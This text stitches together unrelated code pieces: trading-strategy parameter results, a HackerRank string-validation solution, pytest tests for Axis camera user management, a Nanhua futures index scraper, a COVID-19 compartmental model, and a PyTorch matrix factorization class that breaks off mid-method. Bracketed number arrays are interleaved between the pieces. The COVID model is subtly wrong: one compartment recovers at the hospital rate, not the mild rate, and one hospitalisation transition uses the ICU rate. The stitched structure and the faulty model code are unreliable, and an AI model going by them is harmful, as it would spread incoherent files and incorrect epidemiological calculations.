['q9da]', 71, 14, 11.37, 75, 4, 3.13, {'ott_len': 34, 'ott_percent': 172, 'ott_bw': 136, 'tps_qty_index': 90, 'max_risk': 49}],
['eVswv', 63, 19, 11.55, 100, 4, 5.34, {'ott_len': 33, 'ott_percent': 209, 'ott_bw': 155, 'tps_qty_index': 125, 'max_risk': 64}],
['-VUWv', 53, 66, 19.51, 58, 12, 3.47, {'ott_len': 26, 'ott_percent': 209, 'ott_bw': 117, 'tps_qty_index': 74, 'max_risk': 64}],
['@TW*?', 51, 56, 14.24, 45, 11, -1.0, {'ott_len': 28, 'ott_percent': 206, 'ott_bw': 120, 'tps_qty_index': 3, 'max_risk': 30}],
['@^W*?', 45, 57, 21.06, 55, 9, 4.26, {'ott_len': 28, 'ott_percent': 219, 'ott_bw': 120, 'tps_qty_index': 3, 'max_risk': 30}],
['_W6,U', 40, 84, 9.31, 50, 14, 6.21, {'ott_len': 32, 'ott_percent': 210, 'ott_bw': 79, 'tps_qty_index': 6, 'max_risk': 43}],
['-VW*9', 57, 49, 23.19, 27, 11, -0.52, {'ott_len': 26, 'ott_percent': 209, 'ott_bw': 120, 'tps_qty_index': 3, 'max_risk': 26}],
['@cW*?', 47, 61, 22.93, 50, 12, 0.29, {'ott_len': 28, 'ott_percent': 225, 'ott_bw': 120, 'tps_qty_index': 3, 'max_risk': 30}],
['3OWXC', 54, 57, 20.13, 63, 11, 5.57, {'ott_len': 26, 'ott_percent': 200, 'ott_bw': 120, 'tps_qty_index': 76, 'max_risk': 32}],
['3OWXE', 55, 58, 20.61, 63, 11, 5.57, {'ott_len': 26, 'ott_percent': 200, 'ott_bw': 120, 'tps_qty_index': 76, 'max_risk': 33}],
['t]bik', 57, 35, 9.33, 62, 8, 4.47, {'ott_len': 35, 'ott_percent': 217, 'ott_bw': 134, 'tps_qty_index': 103, 'max_risk': 57}],
['-VW<v', 58, 60, 23.78, 58, 12, 3.9, {'ott_len': 26, 'ott_percent': 209, 'ott_bw': 120, 'tps_qty_index': 32, 'max_risk': 64}],
['-VWMv', 50, 61, 23.08, 58, 12, 3.48, {'ott_len': 26, 'ott_percent': 209, 'ott_bw': 120, 'tps_qty_index': 59, 'max_risk': 64}],
['-VW.v', 49, 61, 23.86, 58, 12, 4.35, {'ott_len': 26, 'ott_percent': 209, 'ott_bw': 120, 'tps_qty_index': 9, 'max_risk': 64}],
['7Fpob', 66, 12, 12.15, 75, 4, 3.62, {'ott_len': 27, 'ott_percent': 189, 'ott_bw': 151, 'tps_qty_index': 112, 'max_risk': 52}],
['3OW?n', 54, 59, 24.5, 66, 12, 3.73, {'ott_len': 26, 'ott_percent': 200, 'ott_bw': 120, 'tps_qty_index': 36, 'max_risk': 59}],
['-VWWu', 57, 61, 24.09, 58, 12, 3.47, {'ott_len': 26, 'ott_percent': 209, 'ott_bw': 120, 'tps_qty_index': 74, 'max_risk': 64}],
[',VWWv', 57, 61, 24.09, 58, 12, 3.47, {'ott_len': 26, 'ott_percent': 209, 'ott_bw': 120, 'tps_qty_index': 74, 'max_risk': 64}],
['-VWWs', 57, 61, 24.09, 58, 12, 3.47, {'ott_len': 26, 'ott_percent': 209, 'ott_bw': 120, 'tps_qty_index': 74, 'max_risk': 62}],
['vNqn]', 81, 11, 12.65, 100, 4, 9.27, {'ott_len': 35, 'ott_percent': 199, 'ott_bw': 152, 'tps_qty_index': 111, 'max_risk': 49}],
['-VWWl', 57, 61, 24.09, 58, 12, 3.47, {'ott_len': 26, 'ott_percent': 209, 'ott_bw': 120, 'tps_qty_index': 74, 'max_risk': 58}],
['-VWWa', 58, 60, 22.96, 58, 12, 3.47, {'ott_len': 26, 'ott_percent': 209, 'ott_bw': 120, 'tps_qty_index': 74, 'max_risk': 51}],
['-VWW^', 58, 60, 22.96, 58, 12, 3.47, {'ott_len': 26, 'ott_percent': 209, 'ott_bw': 120, 'tps_qty_index': 74, 'max_risk': 49}],
['3OW5n', 50, 59, 24.24, 66, 12, 4.05, {'ott_len': 26, 'ott_percent': 200, 'ott_bw': 120, 'tps_qty_index': 21, 'max_risk': 59}],
['-VWLv', 50, 60, 24.44, 58, 12, 2.84, {'ott_len': 26, 'ott_percent': 209, 'ott_bw': 120, 'tps_qty_index': 57, 'max_risk': 64}],
['=ptVt', 73, 26, 30.29, 50, 8, 1.89, {'ott_len': 28, 'ott_percent': 241, 'ott_bw': 156, 'tps_qty_index': 73, 'max_risk': 63}],
['g^VGt', 57, 61, 16.78, 63, 11, 5.52, {'ott_len': 33, 'ott_percent': 219, 'ott_bw': 119, 'tps_qty_index': 49, 'max_risk': 63}],
['HPqWv', 64, 17, 16.65, 60, 5, 2.69, {'ott_len': 29, 'ott_percent': 201, 'ott_bw': 152, 'tps_qty_index': 74, 'max_risk': 64}],
['-VW=v', 55, 61, 21.99, 58, 12, 3.27, {'ott_len': 26, 'ott_percent': 209, 'ott_bw': 120, 'tps_qty_index': 33, 'max_risk': 64}],
['-VW?v', 55, 61, 23.02, 58, 12, 3.04, {'ott_len': 26, 'ott_percent': 209, 'ott_bw': 120, 'tps_qty_index': 36, 'max_risk': 64}],
['eRQWv', 52, 63, 17.59, 63, 11, 4.81, {'ott_len': 33, 'ott_percent': 204, 'ott_bw': 112, 'tps_qty_index': 74, 'max_risk': 64}],
['-dW6n', 51, 64, 27.68, 58, 12, 5.23, {'ott_len': 26, 'ott_percent': 226, 'ott_bw': 120, 'tps_qty_index': 22, 'max_risk': 59}],
['@VX*?', 50, 53, 24.04, 50, 10, 1.23, {'ott_len': 28, 'ott_percent': 209, 'ott_bw': 121, 'tps_qty_index': 3, 'max_risk': 30}],
['[\\sta', 66, 18, 12.71, 80, 5, 5.61, {'ott_len': 31, 'ott_percent': 216, 'ott_bw': 155, 'tps_qty_index': 120, 'max_risk': 51}],
['ePRWv', 53, 60, 20.61, 63, 11, 4.2, {'ott_len': 33, 'ott_percent': 201, 'ott_bw': 114, 'tps_qty_index': 74, 'max_risk': 64}],
['O=ITi', 49, 69, 21.32, 61, 13, 4.06, {'ott_len': 30, 'ott_percent': 177, 'ott_bw': 102, 'tps_qty_index': 70, 'max_risk': 56}],
['YOR9c', 51, 60, 21.87, 58, 12, 2.39, {'ott_len': 31, 'ott_percent': 200, 'ott_bw': 114, 'tps_qty_index': 27, 'max_risk': 52}],
['-VW;v', 56, 60, 21.81, 58, 12, 3.24, {'ott_len': 26, 'ott_percent': 209, 'ott_bw': 120, 'tps_qty_index': 30, 'max_risk': 64}],
['eEsWv', 66, 9, 10.3, 75, 4, 5.13, {'ott_len': 33, 'ott_percent': 187, 'ott_bw': 155, 'tps_qty_index': 74, 'max_risk': 64}],
['?^WWv', 53, 60, 21.94, 63, 11, 6.61, {'ott_len': 28, 'ott_percent': 219, 'ott_bw': 120, 'tps_qty_index': 74, 'max_risk': 64}],
['=bVNC', 46, 62, 22.8, 50, 12, -0.59, {'ott_len': 28, 'ott_percent': 224, 'ott_bw': 119, 'tps_qty_index': 60, 'max_risk': 32}],
['3eWXn', 53, 64, 29.51, 58, 12, 4.39, {'ott_len': 26, 'ott_percent': 227, 'ott_bw': 120, 'tps_qty_index': 76, 'max_risk': 59}],
['FVW*?', 50, 53, 22.75, 36, 11, -1.52, {'ott_len': 29, 'ott_percent': 209, 'ott_bw': 120, 'tps_qty_index': 3, 'max_risk': 30}],
['?dpMr', 61, 26, 28.05, 50, 8, 2.43, {'ott_len': 28, 'ott_percent': 226, 'ott_bw': 151, 'tps_qty_index': 59, 'max_risk': 62}],
['3fWHn', 56, 64, 27.28, 58, 12, 4.26, {'ott_len': 26, 'ott_percent': 229, 'ott_bw': 120, 'tps_qty_index': 51, 'max_risk': 59}],
['QYRcn', 50, 65, 19.63, 58, 12, 3.49, {'ott_len': 30, 'ott_percent': 212, 'ott_bw': 114, 'tps_qty_index': 93, 'max_risk': 59}],
['IVWWv', 51, 58, 22.46, 58, 12, 1.85, {'ott_len': 29, 'ott_percent': 209, 'ott_bw': 120, 'tps_qty_index': 74, 'max_risk': 64}],
['?VW.v', 49, 59, 25.96, 58, 12, 2.45, {'ott_len': 28, 'ott_percent': 209, 'ott_bw': 120, 'tps_qty_index': 9, 'max_risk': 64}],
['MVsWv', 66, 18, 17.72, 60, 5, 4.17, {'ott_len': 30, 'ott_percent': 209, 'ott_bw': 155, 'tps_qty_index': 74, 'max_risk': 64}],
['@VW*F', 49, 55, 26.22, 45, 11, -0.99, {'ott_len': 28, 'ott_percent': 209, 'ott_bw': 120, 'tps_qty_index': 3, 'max_risk': 34}],
['?VW2v', 52, 59, 27.13, 58, 12, 2.6, {'ott_len': 28, 'ott_percent': 209, 'ott_bw': 120, 'tps_qty_index': 16, 'max_risk': 64}],
['eVkWv', 72, 22, 20.19, 66, 6, 5.82, {'ott_len': 33, 'ott_percent': 209, 'ott_bw': 145, 'tps_qty_index': 74, 'max_risk': 64}],
['?VuWv', 62, 16, 15.34, 60, 5, 2.75, {'ott_len': 28, 'ott_percent': 209, 'ott_bw': 157, 'tps_qty_index': 74, 'max_risk': 64}],
['hPmHf', 73, 19, 19.46, 75, 4, 4.96, {'ott_len': 33, 'ott_percent': 201, 'ott_bw': 147, 'tps_qty_index': 51, 'max_risk': 54}],
['hPPHs', 57, 63, 21.8, 63, 11, 5.36, {'ott_len': 33, 'ott_percent': 201, 'ott_bw': 111, 'tps_qty_index': 51, 'max_risk': 62}],
['ePPHt', 57, 63, 21.8, 63, 11, 5.36, {'ott_len': 33, 'ott_percent': 201, 'ott_bw': 111, 'tps_qty_index': 51, 'max_risk': 63}],
['XRV.a', 50, 54, 25.07, 58, 12, 1.52, {'ott_len': 31, 'ott_percent': 204, 'ott_bw': 119, 'tps_qty_index': 9, 'max_risk': 51}],
['ePPHa', 57, 63, 21.8, 63, 11, 5.36, {'ott_len': 33, 'ott_percent': 201, 'ott_bw': 111, 'tps_qty_index': 51, 'max_risk': 51}],
['ePPH]', 57, 63, 21.8, 63, 11, 5.36, {'ott_len': 33, 'ott_percent': 201, 'ott_bw': 111, 'tps_qty_index': 51, 'max_risk': 49}],
['CMNWv', 52, 71, 22.36, 58, 12, 4.3, {'ott_len': 28, 'ott_percent': 197, 'ott_bw': 109, 'tps_qty_index': 74, 'max_risk': 64}],
['BVV.a', 50, 59, 27.82, 58, 12, 2.71, {'ott_len': 28, 'ott_percent': 209, 'ott_bw': 119, 'tps_qty_index': 9, 'max_risk': 51}],
['<VV.a', 50, 59, 27.82, 58, 12, 2.71, {'ott_len': 28, 'ott_percent': 209, 'ott_bw': 119, 'tps_qty_index': 9, 'max_risk': 51}],
['ePjWv', 68, 22, 19.21, 66, 6, 5.68, {'ott_len': 33, 'ott_percent': 201, 'ott_bw': 144, 'tps_qty_index': 74, 'max_risk': 64}],
['-VW*=', 55, 54, 29.83, 33, 12, -1.75, {'ott_len': 26, 'ott_percent': 209, 'ott_bw': 120, 'tps_qty_index': 3, 'max_risk': 28}],
['WrVZ;', 49, 65, 9.97, 50, 10, -1.45, {'ott_len': 31, 'ott_percent': 244, 'ott_bw': 119, 'tps_qty_index': 79, 'max_risk': 27}],
['@VW)?', 48, 54, 23.4, 45, 11, -1.08, {'ott_len': 28, 'ott_percent': 209, 'ott_bw': 120, 'tps_qty_index': 2, 'max_risk': 30}],
['E^c[A', 58, 34, 10.18, 50, 10, -1.0, {'ott_len': 29, 'ott_percent': 219, 'ott_bw': 135, 'tps_qty_index': 81, 'max_risk': 31}],
['[VsWv', 63, 19, 14.24, 75, 4, 6.76, {'ott_len': 31, 'ott_percent': 209, 'ott_bw': 155, 'tps_qty_index': 74, 'max_risk': 64}],
['WVsWv', 63, 19, 14.24, 75, 4, 6.76, {'ott_len': 31, 'ott_percent': 209, 'ott_bw': 155, 'tps_qty_index': 74, 'max_risk': 64}],
['fVPWv', 52, 65, 21.16, 53, 13, 1.82, {'ott_len': 33, 'ott_percent': 209, 'ott_bw': 111, 'tps_qty_index': 74, 'max_risk': 64}],
['gVPWv', 52, 65, 21.16, 53, 13, 1.82, {'ott_len': 33, 'ott_percent': 209, 'ott_bw': 111, 'tps_qty_index': 74, 'max_risk': 64}],
['o4,@X', 42, 98, 8.28, 45, 20, 5.45, {'ott_len': 34, 'ott_percent': 166, 'ott_bw': 66, 'tps_qty_index': 38, 'max_risk': 45}],
['@VW*A', 49, 55, 25.8, 45, 11, -0.99, {'ott_len': 28, 'ott_percent': 209, 'ott_bw': 120, 'tps_qty_index': 3, 'max_risk': 31}],
['@VW.?', 49, 55, 20.38, 45, 11, -0.98, {'ott_len': 28, 'ott_percent': 209, 'ott_bw': 120, 'tps_qty_index': 9, 'max_risk': 30}],
['@VWF?', 54, 55, 19.17, 45, 11, -1.64, {'ott_len': 28, 'ott_percent': 209, 'ott_bw': 120, 'tps_qty_index': 47, 'max_risk': 30}],
['ePPWb', 52, 63, 19.94, 63, 11, 4.8, {'ott_len': 33, 'ott_percent': 201, 'ott_bw': 111, 'tps_qty_index': 74, 'max_risk': 52}],
['ePPW\\', 52, 63, 19.94, 63, 11, 4.8, {'ott_len': 33, 'ott_percent': 201, 'ott_bw': 111, 'tps_qty_index': 74, 'max_risk': 48}],
['eSNWd', 50, 67, 18.68, 53, 13, 2.22, {'ott_len': 33, 'ott_percent': 205, 'ott_bw': 109, 'tps_qty_index': 74, 'max_risk': 53}],
['@XW*?', 50, 54, 25.83, 50, 10, 1.55, {'ott_len': 28, 'ott_percent': 211, 'ott_bw': 120, 'tps_qty_index': 3, 'max_risk': 30}],
['@VW4?', 49, 55, 17.59, 45, 11, -1.73, {'ott_len': 28, 'ott_percent': 209, 'ott_bw': 120, 'tps_qty_index': 19, 'max_risk': 30}],
['eVPWc', 52, 65, 21.16, 53, 13, 1.82, {'ott_len': 33, 'ott_percent': 209, 'ott_bw': 111, 'tps_qty_index': 74, 'max_risk': 52}],
['`RNWv', 51, 68, 21.49, 53, 13, 1.56, {'ott_len': 32, 'ott_percent': 204, 'ott_bw': 109, 'tps_qty_index': 74, 'max_risk': 64}],
['cRNWv', 51, 68, 21.49, 53, 13, 1.56, {'ott_len': 32, 'ott_percent': 204, 'ott_bw': 109, 'tps_qty_index': 74, 'max_risk': 64}],
['\\RNWv', 51, 68, 21.49, 53, 13, 1.56, {'ott_len': 32, 'ott_percent': 204, 'ott_bw': 109, 'tps_qty_index': 74, 'max_risk': 64}],
[']RNWv', 51, 68, 21.49, 53, 13, 1.56, {'ott_len': 32, 'ott_percent': 204, 'ott_bw': 109, 'tps_qty_index': 74, 'max_risk': 64}],
['aRNWv', 51, 68, 21.49, 53, 13, 1.56, {'ott_len': 32, 'ott_percent': 204, 'ott_bw': 109, 'tps_qty_index': 74, 'max_risk': 64}],
['^RNWv', 51, 68, 21.49, 53, 13, 1.56, {'ott_len': 32, 'ott_percent': 204, 'ott_bw': 109, 'tps_qty_index': 74, 'max_risk': 64}],
['_RNWv', 51, 68, 21.49, 53, 13, 1.56, {'ott_len': 32, 'ott_percent': 204, 'ott_bw': 109, 'tps_qty_index': 74, 'max_risk': 64}],
['eRNDv', 53, 67, 17.86, 53, 13, 3.08, {'ott_len': 33, 'ott_percent': 204, 'ott_bw': 109, 'tps_qty_index': 44, 'max_risk': 64}],
['eRNWk', 52, 67, 17.52, 53, 13, 2.3, {'ott_len': 33, 'ott_percent': 204, 'ott_bw': 109, 'tps_qty_index': 74, 'max_risk': 57}],
['eRNWZ', 52, 67, 17.52, 53, 13, 2.3, {'ott_len': 33, 'ott_percent': 204, 'ott_bw': 109, 'tps_qty_index': 74, 'max_risk': 47}],
['LewDb', 76, 17, 19.15, 80, 5, 8.45, {'ott_len': 30, 'ott_percent': 227, 'ott_bw': 160, 'tps_qty_index': 44, 'max_risk': 52}],
]
| [
[
[
0,
4
]
]
] |
#!/bin/python3
import math
import os
import random
import re
import sys
# Complete the isValid function below.
def isValid(s):
ss = list(set(s))
fs = []
for c in ss:
fs.append(s.count(c))
if (len(list(set(fs))))==1:
return 'YES'
elif len(list(set(fs)))==2:
mx= max(fs)
mi= min(fs)
if (fs.count(mx) ==1 or fs.count(mi)==1) and (mx-mi == 1):
return 'YES'
elif fs.count(mi)==1 and mi==1:
return 'YES'
return 'NO'
if __name__ == '__main__':
fptr = open(os.environ['OUTPUT_PATH'], 'w')
s = input()
result = isValid(s)
fptr.write(result + '\n')
fptr.close()
| [
[
[
23,
27
]
],
[
[
35,
37
],
[
578,
580
]
],
[
[
45,
51
]
],
[
[
59,
61
]
],
[
[
69,
72
]
],
[
[
117,
124
],
[
641,
648
]
],
[
[
566,
570
],
[
657,
661
],
[
688,
692
]
],
[
[
615,
616
],
[
649,
650
]
],
[
[
632,
638
],
[
668,
674
]
]
] |
"""Test Axis user management.
pytest --cov-report term-missing --cov=axis.pwdgrp_cgi tests/test_pwdgrp_cgi.py
"""
import pytest
from unittest.mock import Mock
from axis.pwdgrp_cgi import SGRP_ADMIN, User, Users
def test_users():
"""Verify that you can list users."""
mock_request = Mock()
users = Users(fixture, mock_request)
assert users['userv']
assert users['userv'].name == 'userv'
assert users['userv'].viewer
assert not users['userv'].operator
assert not users['userv'].admin
assert not users['userv'].ptz
assert users['usero']
assert users['usero'].name == 'usero'
assert users['usero'].viewer
assert users['usero'].operator
assert not users['usero'].admin
assert not users['usero'].ptz
assert users['usera']
assert users['usera'].name == 'usera'
assert users['usera'].viewer
assert users['usera'].operator
assert users['usera'].admin
assert users['usera'].ptz
def test_create():
"""Verify that you can create users."""
mock_request = Mock()
users = Users(fixture, mock_request)
users.create('joe', pwd='abcd', sgrp=SGRP_ADMIN)
mock_request.assert_called_with(
'post', '/axis-cgi/pwdgrp.cgi',
data={
'action': 'add',
'user': 'joe',
'pwd': 'abcd',
'grp': 'users',
'sgrp': 'viewer:operator:admin'
})
users.create('joe', pwd='abcd', sgrp=SGRP_ADMIN, comment='comment')
mock_request.assert_called_with(
'post', '/axis-cgi/pwdgrp.cgi',
data={
'action': 'add',
'user': 'joe',
'pwd': 'abcd',
'grp': 'users',
'sgrp': 'viewer:operator:admin',
'comment': 'comment'
})
def test_modify():
"""Verify that you can modify users."""
mock_request = Mock()
users = Users(fixture, mock_request)
users.modify('joe', pwd='abcd')
mock_request.assert_called_with(
'post', '/axis-cgi/pwdgrp.cgi',
data={
'action': 'update',
'user': 'joe',
'pwd': 'abcd'
})
users.modify('joe', sgrp=SGRP_ADMIN)
mock_request.assert_called_with(
'post', '/axis-cgi/pwdgrp.cgi',
data={
'action': 'update',
'user': 'joe',
'sgrp': 'viewer:operator:admin'
})
users.modify('joe', comment='comment')
mock_request.assert_called_with(
'post', '/axis-cgi/pwdgrp.cgi',
data={
'action': 'update',
'user': 'joe',
'comment': 'comment'
})
users.modify('joe', pwd='abcd', sgrp=SGRP_ADMIN, comment='comment')
mock_request.assert_called_with(
'post', '/axis-cgi/pwdgrp.cgi',
data={
'action': 'update',
'user': 'joe',
'pwd': 'abcd',
'sgrp': 'viewer:operator:admin',
'comment': 'comment'
})
def test_delete():
"""Verify that you can delete users."""
mock_request = Mock()
users = Users(fixture, mock_request)
users.delete('joe')
mock_request.assert_called_with(
'post', '/axis-cgi/pwdgrp.cgi',
data={
'action': 'remove',
'user': 'joe'
})
fixture = """admin="usera,wwwa,wwwaop,wwwaovp,wwwao,wwwap,wwwaov,root"
anonymous=""
api-discovery=""
audio="streamer,sdk,audiocontrol"
basic-device-info=""
gpio="environment,actionengined,led,mediaclipcgi,iod,scheduled,ptzadm,"
operator="usera,usero,sdk,wwwo,wwwaovp,wwwaop,wwwao,wwwop,wwwaov,root"
ptz="usera,wwwop,wwwaop,wwwaovp,wwwap,wwwp,wwwovp,root,wwwvp,wwwavp"
users="userv,usero,usera"
viewer="usera,usero,sdk,wwwaovp,wwwaov,wwwov,wwwovp,wwwav,root,userv,wwwv"
digusers="root,operator,viewer"
"""
| [
[
[
123,
129
]
],
[
[
156,
160
],
[
295,
299
],
[
1044,
1048
],
[
1845,
1849
],
[
3013,
3017
]
],
[
[
190,
200
],
[
1134,
1144
],
[
1442,
1452
],
[
2144,
2154
],
[
2635,
2645
]
],
[
[
202,
206
]
],
[
[
208,
213
],
[
314,
319
],
[
1063,
1068
],
[
1864,
1869
],
[
3032,
3037
]
],
[
[
220,
230
]
],
[
[
966,
977
]
],
[
[
1767,
1778
]
],
[
[
2935,
2946
]
],
[
[
3245,
3252
],
[
320,
327
],
[
1069,
1076
],
[
1870,
1877
],
[
3038,
3045
]
]
] |
#!/usr/bin/env python
# -*- coding:utf-8 -*-
"""
Date: 2021/12/20 14:52
Desc: 南华期货-商品指数历史走势-价格指数-数值
http://www.nanhua.net/nhzc/varietytrend.html
1000 点开始, 用收益率累计
http://www.nanhua.net/ianalysis/varietyindex/price/A.json?t=1574932974280
"""
import time
import requests
import pandas as pd
def futures_nh_index_symbol_table() -> pd.DataFrame:
"""
南华期货-南华指数所有品种一览表
http://www.nanhua.net/ianalysis/varietyindex/price/A.json?t=1574932974280
:return: 南华指数所有品种一览表
:rtype: pandas.DataFrame
"""
url = "http://www.nanhua.net/ianalysis/plate-variety.json"
r = requests.get(url)
data_json = r.json()
temp_df = pd.DataFrame(data_json)
temp_df['firstday'] = pd.to_datetime(temp_df['firstday']).dt.date
return temp_df
def futures_nh_price_index(symbol: str = "A") -> pd.DataFrame:
"""
南华期货-南华指数单品种-价格-所有历史数据
http://www.nanhua.net/ianalysis/varietyindex/price/A.json?t=1574932974280
:param symbol: 通过 ak.futures_nh_index_symbol_table() 获取
:type symbol: str
:return: 南华期货-南华指数单品种-价格-所有历史数据
:rtype: pandas.Series
"""
symbol_df = futures_nh_index_symbol_table()
if symbol in symbol_df["code"].tolist():
t = time.time()
url = f"http://www.nanhua.net/ianalysis/varietyindex/price/{symbol}.json?t={int(round(t * 1000))}"
r = requests.get(url)
data_json = r.json()
temp_df = pd.DataFrame(data_json)
temp_df.columns = ["date", "value"]
temp_df['date'] = pd.to_datetime(temp_df["date"], unit='ms').dt.date
return temp_df
if __name__ == "__main__":
futures_nh_index_symbol_table_df = futures_nh_index_symbol_table()
print(futures_nh_index_symbol_table_df)
futures_nh_price_index_df = futures_nh_price_index(symbol="NHAI")
print(futures_nh_price_index_df)
| [
[
[
247,
251
],
[
1189,
1193
]
],
[
[
260,
268
],
[
584,
592
],
[
1320,
1328
]
],
[
[
276,
288
],
[
330,
332
],
[
641,
643
],
[
691,
693
],
[
805,
807
],
[
1385,
1387
],
[
1479,
1481
]
],
[
[
295,
324
],
[
1621,
1650
],
[
1100,
1129
]
],
[
[
760,
782
],
[
1730,
1752
]
],
[
[
1586,
1618
],
[
1663,
1695
]
],
[
[
1702,
1727
],
[
1778,
1803
]
]
] |
"""Custom COVID19 Compartmental model
"""
from ..model import CompartmentalModel
class COVID19(CompartmentalModel):
def __init__(self,
N,
beta,
incubation_rate = 1/3.7,
recovery_rate_asymptomatic = 1/4.7,
recovery_rate_mild = 1/4.7,
symptoms_to_hospital_rate = 1/5.5,
symptoms_to_icu_rate = 1/7,
proba_severe = 0.071,
proba_asymptomatic = 0.2,
proba_icu = 0.182,
recovery_rate_hospital = 0.046,
recovery_rate_icu = 0.035,
death_rate_hospital = 0.0046,
death_rate_icu = 0.0087,
isolation_ratio = 0.25,
offset = None,
):
"""COVID19 Compartmental Model
Parameters:
Default params are set according to INSERM research paper
"""
params = {
"N":N,
"beta":beta,
"incubation_rate":incubation_rate,
"recovery_rate_asymptomatic":recovery_rate_asymptomatic,
"recovery_rate_mild":recovery_rate_mild,
"recovery_rate_hospital":recovery_rate_hospital,
"recovery_rate_icu":recovery_rate_icu,
"symptoms_to_icu_rate":symptoms_to_icu_rate,
"symptoms_to_hospital_rate":symptoms_to_hospital_rate,
"death_rate_hospital":death_rate_hospital,
"death_rate_icu":death_rate_icu,
"proba_severe":proba_severe,
"proba_asymptomatic":proba_asymptomatic,
"proba_icu":proba_icu,
"isolation_ratio":isolation_ratio,
}
# Define compartments name and number
compartments = ["S","E","Ia","Im","Is","H","ICU","D","R"]
super().__init__(compartments,offset = offset,params = params)
# Parameters
self.N = N
self.beta = self._make_beta_parameter(beta)
# Prepare transitions
transitions = {
"S":{
"E":lambda y,t : y["S"] / N * self.beta(y,t) * (y["Ia"]+ isolation_ratio * (y["Im"] + y["Is"]))
},
"E":{
"Ia":lambda y,t : incubation_rate * (proba_asymptomatic) * y["E"],
"Im":lambda y,t : incubation_rate * (1 - proba_asymptomatic - proba_severe) * y["E"],
"Is":lambda y,t : incubation_rate * (proba_severe) * y["E"],
},
"Ia":{
"R":lambda y,t : recovery_rate_asymptomatic * y["Ia"],
},
"Im":{
"R":lambda y,t : recovery_rate_hospital* y["Im"],
},
"Is":{
"ICU":lambda y,t : symptoms_to_icu_rate * (proba_icu) * y["Is"],
"H":lambda y,t : symptoms_to_icu_rate * (1-proba_icu) * y["Is"],
},
"ICU":{
"R":lambda y,t : recovery_rate_icu * y["ICU"],
"D":lambda y,t : death_rate_icu * y["ICU"],
},
"H":{
"R":lambda y,t : recovery_rate_hospital * y["H"],
"D":lambda y,t : death_rate_hospital * y["H"],
},
}
# Add transition
self.add_transitions(transitions)
def R0(self, beta):
pa = self.params["proba_asymptomatic"]
ps = self.params["proba_severe"]
proba_icu = self.params["proba_icu"]
recovery_rate_asymptomatic = self.params["recovery_rate_asymptomatic"]
recovery_rate_mild = self.params["recovery_rate_mild"]
recovery_rate_severe = (1-proba_icu) * self.params["symptoms_to_hospital_rate"] + proba_icu * self.params["symptoms_to_icu_rate"]
isolation_ratio = self.params["isolation_ratio"]
return beta * (pa / recovery_rate_asymptomatic + (isolation_ratio * (1-pa-ps) / recovery_rate_mild) + (isolation_ratio * ps / recovery_rate_severe))
| [
[
[
63,
81
],
[
98,
116
]
],
[
[
90,
97
]
]
] |
from lib.utils import top_k
from TraditionalRecommenderSystems.MatrixFactorization.Models import BaseMF
import numpy as np
import pandas as pd
import torch
from torch import nn
import torch.utils.data as data
from tqdm import tqdm
class MatrixFactorization(object):
def __init__(self, user_item_pairs, user_list, item_list, nb_factor=40, drop_rate=0.5, batch_size=32, lr=1e-1,
optimizer=torch.optim.Adam, loss_func=nn.MSELoss(reduction='mean'), sparse=False,
weight_decay=0., device='cuda', pro_process=None):
"""
Matrix Factorization based on Pytorch.
:param user_item_pairs: list. [(user, item, rating)].
:param user_list: list. The list of all the users (with no repeat).
:param item_list: list. The list of all the items (with no repeat).
:param nb_factor: int. The number of factors.
:param drop_rate: float 0~1. Drop rate of the dropout layer.
:param batch_size: int. Batch size of training
:param lr: float. Learning rate.
:param optimizer: torch.optim. Optimizer utilized to train the model.
:param loss_func: torch.nn.*Loss. Loss function of training.
:param sparse: boolean. The gradient requires to be sparse or not.
:param weight_decay: float. L2 regularization.
:param device: 'cpu' or 'cuda'.
:param pro_process: nn.Module.
"""
self.user_item_pairs = pd.DataFrame(user_item_pairs)
# build index-user, index-item
self.index_2_user = np.array(user_list)
self.index_2_item = np.array(item_list)
assert len(self.index_2_user) == len(set(self.index_2_user))
assert len(self.index_2_item) == len(set(self.index_2_item))
self.user_2_index = {self.index_2_user[i]: i for i in range(len(self.index_2_user))}
self.item_2_index = {self.index_2_item[i]: i for i in range(len(self.index_2_item))}
self.nb_user, self.nb_item = len(user_list), len(item_list)
# prepare training loader
train_user_indices = torch.from_numpy(self.users_to_indices(self.user_item_pairs[0].values)).long()
train_item_indices = torch.from_numpy(self.items_to_indices(self.user_item_pairs[1].values)).long()
train_ratings = torch.from_numpy(self.user_item_pairs[2].values.reshape(-1, 1)).float()
self.train_data_loader = data.DataLoader(data.TensorDataset(train_user_indices, train_item_indices,
train_ratings), batch_size=batch_size, shuffle=True)
# build model
self.nb_factor = nb_factor
self.lr = lr
self.batch_size = batch_size
self.loss_func = loss_func
self.weight_decay = weight_decay
self.device = device
self.sparse = sparse
self.process = pro_process
self.model = BaseMF(self.nb_user, self.nb_item, nb_factor, drop_rate, sparse, pro_process=self.process).to(device)
self.optimizer = optimizer(self.model.parameters(), lr=lr, weight_decay=weight_decay)
# build history rating matrix
self.pred_rating_matrix = None
self.history_rating_matrix = None
self.update_history_rating_matrix()
def train(self, epochs, test_data=None, test_epoch_step=1):
"""
Train the model.
:param epochs: int. The epochs of training.
:param test_data: [(user, item, rating)]. None if no validation is applied.
:param test_epoch_step: int. The step of validation.
:return: (list of training loss, list of test loss) if validation is applied, else only the list of training loss.
"""
hist_train_loss, hist_test_loss = [], []
if test_data is not None:
test_data = pd.DataFrame(test_data)
for epoch in range(epochs):
print('Epoch-{}/{}:'.format(epoch+1, epochs))
self.model.train()
train_loss = self.train_epoch()
hist_train_loss.append(train_loss)
if (test_data is not None) and (epoch % test_epoch_step == 0):
self.model.eval()
test_loss = self.eval(test_data.iloc[:, [0, 1]].values, ground_truth=test_data[2].values)
hist_test_loss.append(test_loss)
print('training loss = {}, test loss = {}'.format(train_loss, test_loss))
else:
print('training loss = {}'.format(train_loss))
self.update_pred_rating_matrix()
return hist_train_loss, hist_test_loss
def train_epoch(self):
"""
:return: training loss.
"""
self.model.train()
epoch_loss = 0.
for id_user, id_item, id_rating in tqdm(self.train_data_loader):
batch_loss = self.train_on_batch(id_user, id_item, id_rating)
epoch_loss += batch_loss
epoch_loss /= len(self.train_data_loader)
return epoch_loss
def train_on_batch(self, user_indices, item_indices, ratings):
users, items, ratings = user_indices.to(self.device), item_indices.to(self.device), ratings.to(self.device)
self.optimizer.zero_grad()
outputs = self.model(users, items)
loss = self.loss_func(outputs, ratings)
loss.backward()
self.optimizer.step()
return loss.item()
def eval(self, user_item_pairs, ground_truth, batch_size=100):
"""
Predict the ratings of the pairs of (user, item).
:param user_item_pairs: list of (user, item).
:param ground_truth: the ground truth rating.
:param batch_size: batch_size of predicting.
:return: ratings. size=[nb_pairs]
"""
self.model.eval()
